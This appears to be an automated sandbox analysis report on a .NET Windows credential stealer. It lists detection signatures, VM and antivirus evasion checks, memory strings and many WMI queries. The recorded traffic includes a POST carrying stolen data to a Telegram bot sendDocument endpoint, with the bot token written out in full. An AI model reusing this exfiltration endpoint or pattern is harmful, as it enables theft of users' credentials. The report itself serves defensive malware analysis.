Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545748
MD5: cae3f7ae06655eb93f5dfb028ddd3d6d
SHA1: 54821b16fab00ec529f0b99e1d49de8d291eb492
SHA256: 1fc74fb83aebbe5a37b41e7a4e900a83288618ca696d76a717e2d6a51fad343f
Tags: exe, user-Bitsight

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Generic Stealer
.NET source code references suspicious native API functions
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\file.exe" MD5: CAE3F7AE06655EB93F5DFB028DDD3D6D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.3890665414.000001E394D0B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
Process Memory Space: file.exe PID: 7140 | JoeSecurity_GenericStealer_9 | Yara detected Generic Stealer | Joe Security |
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: file.exe | ReversingLabs: Detection: 65%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848EA3E02 CryptUnprotectData
Source: unknown | HTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
  GET /v1/ip/geo.json HTTP/1.1
  Host: get.geojs.io
  Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.26.0.100
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
  Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06a
  Host: api.telegram.org
  Content-Length: 722595
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: get.geojs.io
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
  POST /bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
  Content-Type: multipart/form-data; boundary=----------------------------8dcf90c40a3b06a
  Host: api.telegram.org
  Content-Length: 722595
  Expect: 100-continue
  Connection: Keep-Alive
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: file.exe, 00000000.00000002.3890665414.000001E394E82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://get.geojs.io
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: file.exe, 00000000.00000002.3890665414.000001E394D25000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6217988193:AAFiJwdcFHDuCM08fAA_dnBQZGLDPSVjUQY/sendDocument
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geH
Source: file.exe, 00000000.00000002.3890665414.000001E394E73000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io
Source: file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://get.geojs.io/v1/ip/geo.json
Source: file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/TheDyer
Source: file.exe, 00000000.00000002.3891361029.000001E3A5051000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/freakcodingspot
Source: file.exe, 00000000.00000002.3890665414.000001E394EFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3890665414.000001E394C91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/webster480
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.3891361029.000001E3A4EDF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848EAB57D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848E95D12
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848EAE7B3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848E94F66
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848E9CF1C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF848E9E0F5
Source: file.exe, 00000000.00000002.3890374736.000001E3932B6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.2029423115.000001E393022000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesystem.exeH vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenamesystem.exeH vs file.exe
Source: classification engine | Classification label: mal88.troj.spyw.evad.winEXE@1/1@2/2
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log
Source: C:\Users\user\Desktop\file.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\Icyfydotatacymefytuvemukylihibe
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6464
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2584
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5600
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6460
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3008
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6960
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4268
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2972
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5556
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4984
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3396
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2964
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6096
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3380
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2516
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2940
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5508
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1656
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 760
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5500
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4396
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4196
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3332
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5052
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4616
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2448
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3452
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3724
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3720
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7160
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4564
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6284
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7140
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2848
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1100
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7132
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6688
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4180
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2804
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3228
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6668
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2788
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3648
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2352
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5368
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5796
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7088
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7080
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6644
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5780
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1900
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Users\user\Desktop\file.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6692
